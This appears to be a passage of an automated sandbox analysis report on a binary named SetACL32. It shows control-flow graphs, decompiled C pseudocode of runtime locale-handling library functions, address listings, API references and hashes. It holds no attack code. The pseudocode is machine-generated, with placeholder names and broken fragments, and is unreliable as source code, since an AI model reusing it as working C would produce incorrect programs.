              control_flow_graph 572 12d036b-12d03c9 call 12d7220 call 12cfa56 577 12d03cf-12d03e4 572->577 578 12d06a1 572->578 579 12d03e6-12d03f9 577->579 580 12d06a3-12d06b1 call 12cae19 578->580 581 12d03fb-12d03ff 579->581 582 12d0430-12d0432 579->582 584 12d0428-12d042e 581->584 585 12d0401-12d0416 581->585 586 12d0435-12d0437 582->586 584->586 585->582 588 12d0418-12d0426 585->588 589 12d0439-12d043b 586->589 590 12d0440-12d0446 586->590 588->579 588->584 589->580 591 12d0449-12d0456 590->591 591->591 592 12d0458-12d047b call 12d8049 591->592 592->578 595 12d0481-12d04c1 call 12d810c 592->595 598 12d04c7-12d04d8 595->598 599 12d0721-12d0731 call 12cf37c 595->599 600 12d04ee-12d04f5 call 12cf751 598->600 601 12d04da-12d04e2 598->601 607 12d04fa-12d04fb 600->607 601->600 603 12d04e4-12d04ec 601->603 606 12d0501-12d050b 603->606 608 12d062b-12d062e 606->608 609 12d0511-12d0536 606->609 607->606 611 12d063b-12d063e 608->611 612 12d0630-12d0639 608->612 610 12d053c-12d0541 609->610 613 12d058a-12d058c 610->613 614 12d0543-12d0586 610->614 615 12d0649-12d0666 611->615 616 12d0640-12d0646 611->616 612->615 618 12d05ad-12d05b0 613->618 619 12d058e-12d05a9 613->619 614->610 617 12d0588 614->617 628 12d0668-12d069e call 12d800f * 2 615->628 629 12d06b2-12d06b8 615->629 616->615 617->618 620 12d0623-12d0629 618->620 621 12d05b2-12d05d7 call 12d83df 618->621 619->618 620->615 626 12d05d9 621->626 627 12d0615 621->627 630 12d05df-12d05f0 626->630 632 12d061b-12d0621 627->632 628->578 633 12d06ba-12d06c9 629->633 634 12d0704 629->634 630->630 635 12d05f2-12d0613 call 12ccf50 630->635 632->620 633->634 638 12d06cb-12d0702 call 12d800f * 3 633->638 637 12d070a-12d071f 634->637 635->632 637->580 638->637
              C-Code - Quality: 67%
              			E012D036B(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t161;
				signed int _t162;
				intOrPtr _t163;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t198;
				signed int _t200;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				void* _t210;
				signed int _t217;
				intOrPtr* _t218;
				char* _t225;
				signed int _t227;
				intOrPtr _t230;
				intOrPtr* _t231;
				signed int _t233;
				signed int* _t237;
				signed int _t238;
				intOrPtr _t245;
				void* _t246;
				void* _t249;
				signed int _t251;
				signed int _t253;
				signed int _t256;
				signed int* _t257;
				intOrPtr* _t258;
				short _t259;
				signed int _t261;
				signed int _t265;
				void* _t267;
				void* _t269;

				_t243 = __edx;
				_t261 = _t265;
				_t151 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t151 ^ _t261;
				_push(__ebx);
				_t209 = _a8;
				_push(__esi);
				_push(__edi);
				_t245 = _a4;
				_v736 = _t209;
				_v724 = E012D7220(__ecx, __edx) + 0x278;
				_t158 = E012CFA56(_t209, __edx, _t245, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t267 = _t265 - 0x2e4 + 0x18;
				if(_t158 == 0) {
					L40:
					_t159 = 0;
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t209 + 2; // 0x6
					_t251 = _t10 << 4;
					_t161 =  &_v272;
					_v716 = _t251;
					_t243 =  *(_t251 + _t245);
					_t217 = _t243;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t253 = _v716;
						if( *_t161 !=  *_t217) {
							break;
						}
						if( *_t161 == 0) {
							L7:
							_t162 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t161 + 2));
							_v706 = _t259;
							_t253 = _v716;
							if(_t259 !=  *((intOrPtr*)(_t217 + 2))) {
								break;
							} else {
								_t161 = _t161 + 4;
								_t217 = _t217 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t162 != 0) {
							_t218 =  &_v272;
							_t243 = _t218 + 2;
							do {
								_t163 =  *_t218;
								_t218 = _t218 + 2;
								__eflags = _t163 - _v704;
							} while (_t163 != _v704);
							_v720 = (_t218 - _t243 >> 1) + 1;
							_t166 = E012D8049(4 + ((_t218 - _t243 >> 1) + 1) * 2);
							_v732 = _t166;
							__eflags = _t166;
							if(_t166 == 0) {
								goto L40;
							} else {
								_v728 =  *((intOrPtr*)(_t253 + _t245));
								_v740 =  *(_t245 + 0xa0 + _t209 * 4);
								_v744 =  *(_t245 + 8);
								_t225 =  &_v272;
								_v708 = _t166 + 4;
								_t168 = E012D810C(_t166 + 4, _v720, _t225);
								_t269 = _t267 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E012CF37C();
									asm("int3");
									_push(_t261);
									_push(_t225);
									_v784 = _v784 & 0x00000000;
									_t172 = E012DA806(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t172;
									if(_t172 == 0) {
										L50:
										_t173 = 0xfde9;
									} else {
										_t173 = _v12;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L50;
										}
									}
									return _t173;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t245)) = _v708;
									if(_v272 != 0x43) {
										L18:
										_push( &_v700); // executed
										_t176 = E012CF751(_t209, _t245); // executed
										_t227 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t227 = _v704;
											_t176 = _t227;
										}
									}
									 *(_t245 + 0xa0 + _t209 * 4) = _t176;
									__eflags = _t209 - 2;
									if(_t209 != 2) {
										__eflags = _t209 - 1;
										if(_t209 != 1) {
											__eflags = _t209 - 5;
											if(_t209 == 5) {
												 *((intOrPtr*)(_t245 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t245 + 0x10)) = _v712;
										}
									} else {
										_t257 = _v724;
										_t243 = _t227;
										_t237 = _t257;
										 *(_t245 + 8) = _v712;
										_v708 = _t257;
										_v720 = _t257[8];
										_v712 = _t257[9];
										while(1) {
											__eflags =  *(_t245 + 8) -  *_t237;
											if( *(_t245 + 8) ==  *_t237) {
												break;
											}
											_t258 = _v708;
											_t243 = _t243 + 1;
											_t207 =  *_t237;
											 *_t258 = _v720;
											_v712 = _t237[1];
											_t237 = _t258 + 8;
											 *((intOrPtr*)(_t258 + 4)) = _v712;
											_t209 = _v736;
											_t257 = _v724;
											_v720 = _t207;
											_v708 = _t237;
											__eflags = _t243 - 5;
											if(_t243 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t243 - 5;
											if(__eflags == 0) {
												_t198 = E012D83DF(_t243, __eflags, _v704, 1, 0x12f0110, 0x7f,  &_v528,  *(_t245 + 8), 1);
												_t269 = _t269 + 0x1c;
												__eflags = _t198;
												if(_t198 == 0) {
													_t238 = _v704;
												} else {
													_t200 = _v704;
													do {
														 *(_t261 + _t200 * 2 - 0x20c) =  *(_t261 + _t200 * 2 - 0x20c) & 0x000001ff;
														_t200 = _t200 + 1;
														__eflags = _t200 - 0x7f;
													} while (_t200 < 0x7f);
													_t202 = E012CCF50( &_v528,  *0x1309070, 0xfe);
													_t269 = _t269 + 0xc;
													__eflags = _t202;
													_t238 = 0 | _t202 == 0x00000000;
												}
												_t257[1] = _t238;
												 *_t257 =  *(_t245 + 8);
											}
											 *(_t245 + 0x18) = _t257[1];
											goto L38;
										}
										__eflags = _t243;
										if(_t243 != 0) {
											 *_t257 =  *(_t257 + _t243 * 8);
											_t257[1] =  *(_t257 + 4 + _t243 * 8);
											 *(_t257 + _t243 * 8) = _v720;
											 *(_t257 + 4 + _t243 * 8) = _v712;
										}
										goto L26;
									}
									L38:
									_t177 = _t209 * 0xc;
									_t106 = _t177 + 0x12f0198; // 0x1297da0
									 *0x12ee308(_t245);
									_t179 =  *((intOrPtr*)( *_t106))();
									_t230 = _v728;
									__eflags = _t179;
									if(_t179 == 0) {
										__eflags = _t230 - 0x1309268;
										if(_t230 == 0x1309268) {
											L45:
											_t180 = _v716;
										} else {
											_t256 = _t209 + _t209;
											__eflags = _t256;
											asm("lock xadd [eax], ecx");
											if(_t256 != 0) {
												goto L45;
											} else {
												E012D800F( *((intOrPtr*)(_t245 + 0x28 + _t256 * 8)));
												E012D800F( *((intOrPtr*)(_t245 + 0x24 + _t256 * 8)));
												E012D800F( *(_t245 + 0xa0 + _t209 * 4));
												_t180 = _v716;
												_t233 = _v704;
												 *(_t180 + _t245) = _t233;
												 *(_t245 + 0xa0 + _t209 * 4) = _t233;
											}
										}
										_t231 = _v732;
										 *_t231 = 1;
										_t159 =  *(_t180 + _t245);
										 *((intOrPtr*)(_t245 + 0x28 + (_t209 + _t209) * 8)) = _t231;
									} else {
										 *((intOrPtr*)(_v716 + _t245)) = _t230;
										E012D800F( *(_t245 + 0xa0 + _t209 * 4));
										 *(_t245 + 0xa0 + _t209 * 4) = _v740;
										E012D800F(_v732);
										 *(_t245 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							_t159 = _t243;
							L41:
							_pop(_t246);
							_pop(_t249);
							_pop(_t210);
							return E012CAE19(_t159, _t210, _v8 ^ _t261, _t243, _t246, _t249);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t162 = _t161 | 0x00000001;
					__eflags = _t162;
					goto L9;
				}
				L52:
			}



































































              0x012d036b
              0x012d036e
              0x012d0376
              0x012d037d
              0x012d0380
              0x012d0381
              0x012d0384
              0x012d0388
              0x012d0389
              0x012d038c
              0x012d039c
              0x012d03bf
              0x012d03c4
              0x012d03c9
              0x012d06a1
              0x012d06a1
              0x012d06a1
              0x00000000
              0x012d03cf
              0x012d03cf
              0x012d03d2
              0x012d03d5
              0x012d03db
              0x012d03e1
              0x012d03e4
              0x012d03e6
              0x012d03e9
              0x012d03f3
              0x012d03f9
              0x00000000
              0x00000000
              0x012d03ff
              0x012d0428
              0x012d0428
              0x012d0401
              0x012d0401
              0x012d0409
              0x012d0410
              0x012d0416
              0x00000000
              0x012d0418
              0x012d0418
              0x012d041b
              0x012d0426
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d0426
              0x012d0416
              0x012d0435
              0x012d0437
              0x012d0440
              0x012d0446
              0x012d0449
              0x012d0449
              0x012d044c
              0x012d044f
              0x012d044f
              0x012d045f
              0x012d046d
              0x012d0472
              0x012d0479
              0x012d047b
              0x00000000
              0x012d0481
              0x012d0487
              0x012d0494
              0x012d049d
              0x012d04a3
              0x012d04b0
              0x012d04b7
              0x012d04bc
              0x012d04bf
              0x012d04c1
              0x012d0721
              0x012d0727
              0x012d0728
              0x012d0729
              0x012d072a
              0x012d072b
              0x012d072c
              0x012d0731
              0x012d0734
              0x012d0737
              0x012d0738
              0x012d074a
              0x012d074f
              0x012d0751
              0x012d075a
              0x012d075a
              0x012d0753
              0x012d0753
              0x012d0756
              0x012d0758
              0x00000000
              0x00000000
              0x012d0758
              0x012d0760
              0x012d04c7
              0x012d04c7
              0x012d04d5
              0x012d04d8
              0x012d04ee
              0x012d04f4
              0x012d04f5
              0x012d04fb
              0x012d04da
              0x012d04da
              0x012d04e2
              0x00000000
              0x012d04e4
              0x012d04e4
              0x012d04ea
              0x012d04ea
              0x012d04e2
              0x012d0501
              0x012d0508
              0x012d050b
              0x012d062b
              0x012d062e
              0x012d063b
              0x012d063e
              0x012d0646
              0x012d0646
              0x012d0630
              0x012d0636
              0x012d0636
              0x012d0511
              0x012d0511
              0x012d0517
              0x012d051f
              0x012d0521
              0x012d0524
              0x012d052d
              0x012d0536
              0x012d053c
              0x012d053f
              0x012d0541
              0x00000000
              0x00000000
              0x012d0543
              0x012d0549
              0x012d054a
              0x012d0555
              0x012d055d
              0x012d0565
              0x012d0568
              0x012d056b
              0x012d0571
              0x012d0577
              0x012d057d
              0x012d0583
              0x012d0586
              0x00000000
              0x00000000
              0x012d0588
              0x012d05ad
              0x012d05ad
              0x012d05b0
              0x012d05cd
              0x012d05d2
              0x012d05d5
              0x012d05d7
              0x012d0615
              0x012d05d9
              0x012d05d9
              0x012d05df
              0x012d05e4
              0x012d05ec
              0x012d05ed
              0x012d05ed
              0x012d0604
              0x012d060b
              0x012d060e
              0x012d0610
              0x012d0610
              0x012d061b
              0x012d0621
              0x012d0621
              0x012d0626
              0x00000000
              0x012d0626
              0x012d058a
              0x012d058c
              0x012d0591
              0x012d0597
              0x012d05a0
              0x012d05a9
              0x012d05a9
              0x00000000
              0x012d058c
              0x012d0649
              0x012d0649
              0x012d064d
              0x012d0655
              0x012d065b
              0x012d065e
              0x012d0664
              0x012d0666
              0x012d06b2
              0x012d06b8
              0x012d0704
              0x012d0704
              0x012d06ba
              0x012d06bf
              0x012d06bf
              0x012d06c5
              0x012d06c9
              0x00000000
              0x012d06cb
              0x012d06cf
              0x012d06d8
              0x012d06e4
              0x012d06e9
              0x012d06f2
              0x012d06f8
              0x012d06fb
              0x012d06fb
              0x012d06c9
              0x012d070a
              0x012d0712
              0x012d0718
              0x012d071b
              0x012d0668
              0x012d066e
              0x012d0678
              0x012d068a
              0x012d0691
              0x012d069e
              0x00000000
              0x012d069e
              0x00000000
              0x012d0666
              0x012d04c1
              0x012d0439
              0x012d0439
              0x012d06a3
              0x012d06a6
              0x012d06a7
              0x012d06aa
              0x012d06b1
              0x012d06b1
              0x00000000
              0x012d0437
              0x012d0430
              0x012d0432
              0x012d0432
              0x00000000
              0x012d0432
              0x00000000

              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              • _free.LIBCMT ref: 012D0678
              • _free.LIBCMT ref: 012D0691
              • _free.LIBCMT ref: 012D06CF
              • _free.LIBCMT ref: 012D06D8
              • _free.LIBCMT ref: 012D06E4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free$ErrorLast
              • String ID: C
              • API String ID: 3291180501-1037565863
              • Opcode ID: f19ae7c7d0339d8d8d737131dc052b35a2eaf5164d3d1f396618787012f2ddac
              • Instruction ID: 6b6a263f1d7529249365411c482c386934cebdd7953ad0e9512293bdf24e5281
              • Opcode Fuzzy Hash: f19ae7c7d0339d8d8d737131dc052b35a2eaf5164d3d1f396618787012f2ddac
              • Instruction Fuzzy Hash: 7EB16B75A1121A9FDB24DF18C894BADB7B4FF48304F2045AEE949A7360D770AE90CF84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CFEE0 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 741 12cfee0-12cff01 call 12d8049 744 12d001e-12d0021 741->744 745 12cff07-12cff3b call 12cfe1c 741->745 748 12cff3e-12cff53 call 12d8097 745->748 751 12d006e-12d00a4 call 12cf37c 748->751 752 12cff59-12cff66 748->752 764 12d00c7-12d00e3 751->764 765 12d00a6-12d00a8 751->765 753 12cff69-12cff6f 752->753 755 12cff8f-12cff91 753->755 756 12cff71-12cff74 753->756 760 12cff94-12cffce call 12cfe1c 755->760 758 12cff8b-12cff8d 756->758 759 12cff76-12cff7e 756->759 758->760 759->755 762 12cff80-12cff89 759->762 760->748 771 12cffd4-12cffd8 760->771 762->753 762->758 769 12d00e9-12d00ed 764->769 770 12d0343-12d0344 call 12cfee0 764->770 767 12d00ba-12d00c2 765->767 768 12d00aa-12d00b5 call 12d036b 765->768 774 12d034a-12d0358 call 12cae19 767->774 768->774 775 12d025b-12d0282 call 12cfa56 769->775 776 12d00f3-12d00f8 769->776 780 12d0349 770->780 778 12cffda-12cffe2 771->778 779 12d0022-12d0031 call 12d800f 771->779 775->774 793 12d0288-12d028f 775->793 776->775 783 12d00fe-12d0103 776->783 787 12cffe4-12cffea 778->787 788 12cfff5-12cfffa 778->788 800 12d0044-12d0049 779->800 801 12d0033-12d0039 779->801 780->774 783->775 784 12d0109-12d0120 call 12d8391 783->784 804 12d0254-12d0256 784->804 805 12d0126-12d0130 784->805 787->788 795 12cffec-12cfff4 call 12d800f 787->795 790 12cfffc-12d0001 788->790 791 12d000c-12d001a 788->791 790->791 796 12d0003-12d000b call 12d800f 790->796 799 12d001d 791->799 798 12d0295-12d0297 793->798 795->788 796->791 806 12d029d-12d029f 798->806 807 12d031e 798->807 799->744 810 12d005b-12d006c 800->810 811 12d004b-12d0050 800->811 801->800 808 12d003b-12d0043 call 12d800f 801->808 804->774 805->804 814 12d0136-12d013c 805->814 816 12d02a5-12d02b1 806->816 815 12d0324-12d0331 807->815 808->800 810->799 811->810 812 12d0052-12d005a call 12d800f 811->812 812->810 814->804 819 12d0142-12d014d 814->819 815->798 820 12d0337-12d0339 815->820 821 12d02e6-12d02eb 816->821 822 12d02b3-12d02b7 816->822 825 12d0157-12d0165 call 12d6ea8 819->825 820->770 826 12d033b-12d033d 820->826 829 12d02ed-12d02ef 821->829 827 12d02b9-12d02ce 822->827 828 12d02e0-12d02e4 822->828 837 12d0167-12d0169 825->837 838 12d0183-12d0192 825->838 826->770 831 12d033f-12d0341 826->831 827->821 832 12d02d0-12d02de 827->832 828->829 833 12d031d 829->833 834 12d02f1-12d02fa call 12d036b 829->834 831->774 832->816 832->828 833->807 839 12d02ff-12d030a 834->839 842 12d016c-12d0179 837->842 838->825 843 12d0194-12d01b4 call 12d8338 838->843 840 12d030c-12d030f 839->840 841 12d0311-12d031b 839->841 840->807 841->815 842->842 844 12d017b-12d0181 842->844 847 12d01b6-12d01bc 843->847 848 12d01c2-12d01c9 843->848 844->838 844->843 847->804 847->848 849 12d01cb-12d01e3 call 12d832d 848->849 850 12d022a 848->850 856 12d035e-12d036a call 12cf37c 849->856 857 12d01e9-12d01f1 849->857 852 12d0230-12d023b 850->852 854 12d023d-12d0240 852->854 855 12d0243-12d0246 852->855 854->855 855->784 858 12d024c-12d024e 855->858 860 12d0359 call 12cb837 857->860 861 12d01f7-12d021f call 12d036b 857->861 858->770 858->804 860->856 861->852 866 12d0221-12d0228 861->866 866->852
              C-Code - Quality: 74%
              			E012CFEE0(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t244;
				signed int _t246;
				void* _t249;
				signed int _t252;
				signed int _t254;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t296;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t305;
				signed int _t323;
				signed int _t325;
				signed int _t327;
				signed int _t332;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t341;
				signed int _t342;
				intOrPtr* _t347;
				signed int _t361;
				signed int _t363;
				void* _t364;
				signed int _t365;
				intOrPtr* _t366;
				signed int _t368;
				void* _t369;
				void* _t373;
				signed int _t377;
				intOrPtr* _t378;
				intOrPtr* _t381;
				void* _t384;
				signed int _t385;
				signed int _t388;
				intOrPtr* _t389;
				char* _t396;
				signed int _t398;
				intOrPtr _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				signed int _t409;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				intOrPtr* _t459;
				short _t460;
				signed int _t462;
				signed int _t463;
				void* _t465;
				void* _t466;
				signed int _t467;
				void* _t468;
				void* _t469;
				signed int _t470;
				void* _t472;
				void* _t473;
				signed int _t485;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t244 = E012D8049(0x6a6); // executed
				_t361 = _t244;
				_t245 = 0;
				_pop(_t373);
				if(_t361 == 0) {
					L20:
					return _t245;
				} else {
					_push(__edi);
					_t2 = _t361 + 4; // 0x4
					_t428 = _t2;
					 *_t428 = 0;
					 *_t361 = 1;
					_t444 = _a4;
					_t246 = _t444 + 0x30;
					_push( *_t246);
					_v16 = _t246;
					_push("=");
					_push( *0x12f019c);
					E012CFE1C(_t361, _t373, __edx, _t428, _t444, _t428, 0x351, 3);
					_t466 = _t465 + 0x18;
					_v8 = 0x12f019c;
					while(1) {
						L2:
						_t249 = E012D8097(_t428, 0x351, ";");
						_t467 = _t466 + 0xc;
						if(_t249 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t341 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t341;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t342 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t341 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t341 = _t341 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push("=");
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t342);
							_t347 = _v8 + 0xc;
							_v8 = _t347;
							_push( *_t347);
							E012CFE1C(_t361, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t466 = _t467 + 0x18;
							if(_v8 < 0x12f01cc) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E012D800F(_t361);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E012D800F( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E012D800F( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t245 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t485 =  *(_t444 + 0x28);
									if(_t485 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t485 == 0) {
											E012D800F( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E012D800F( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t361 + 4; // 0x4
									_t245 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t361;
									 *((intOrPtr*)(_t444 + 0x20)) = _t245;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t342 = _t341 | 0x00000001;
						__eflags = _t342;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E012CF37C();
					asm("int3");
					_t462 = _t467;
					_t468 = _t467 - 0x1d0;
					_t252 =  *0x1309018; // 0xedd8d3b4
					_v60 = _t252 ^ _t462;
					_t254 = _v44;
					_push(_t361);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t254;
					if(_t254 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t363 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L80:
							_t254 = E012CFEE0(_t363, _t424, _t429, _t445, __eflags, _t429); // executed
							goto L81;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L60:
								_t254 = E012CFA56(_t363, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468); // executed
								_t469 = _t468 + 0x18;
								__eflags = _t254;
								if(_t254 != 0) {
									_t377 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L75:
											_t260 = _v460;
										} else {
											_t378 =  *_t425;
											_t261 =  &_v276;
											while(1) {
												__eflags =  *_t261 -  *_t378;
												_t429 = _v464;
												if( *_t261 !=  *_t378) {
													break;
												}
												__eflags =  *_t261;
												if( *_t261 == 0) {
													L68:
													_t377 = 0;
													_t262 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t261 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t378 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t378 + 2))) {
														break;
													} else {
														_t261 = _t261 + 4;
														_t378 = _t378 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t262;
												if(_t262 == 0) {
													_t363 = _t363 + 1;
													__eflags = _t363;
													goto L75;
												} else {
													_t263 =  &_v276;
													_push(_t263);
													_push(_t447);
													_push(_t429); // executed
													L84(); // executed
													_t425 = _v452;
													_t469 = _t469 + 0xc;
													__eflags = _t263;
													if(_t263 == 0) {
														_t377 = 0;
														_t260 = 0;
														_v460 = 0;
													} else {
														_t363 = _t363 + 1;
														_t377 = 0;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t262 = _t261 | 0x00000001;
											_t377 = 0;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t260;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t363;
										if(__eflags != 0) {
											goto L80;
										} else {
											_t254 = _t377;
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t264 = E012D8391(_t445, 0x12f0254);
											_t365 = _t264;
											_v468 = _t365;
											_pop(_t380);
											__eflags = _t365;
											if(_t365 == 0) {
												break;
											}
											_t265 = _t264 - _t445;
											__eflags = _t265;
											_v460 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t365 - _t267;
												if( *_t365 == _t267) {
													break;
												} else {
													_t432 = _v460;
													_t366 = 0x12f019c;
													_v456 = 1;
													do {
														_t268 = E012D6EA8( *_t366, _t445, _t432);
														_t468 = _t468 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t381 =  *_t366;
															_t424 = _t381 + 2;
															do {
																_t337 =  *_t381;
																_t381 = _t381 + 2;
																__eflags = _t337 - _v472;
															} while (_t337 != _v472);
															_t380 = _t381 - _t424 >> 1;
															__eflags = _t432 - _t381 - _t424 >> 1;
															if(_t432 != _t381 - _t424 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
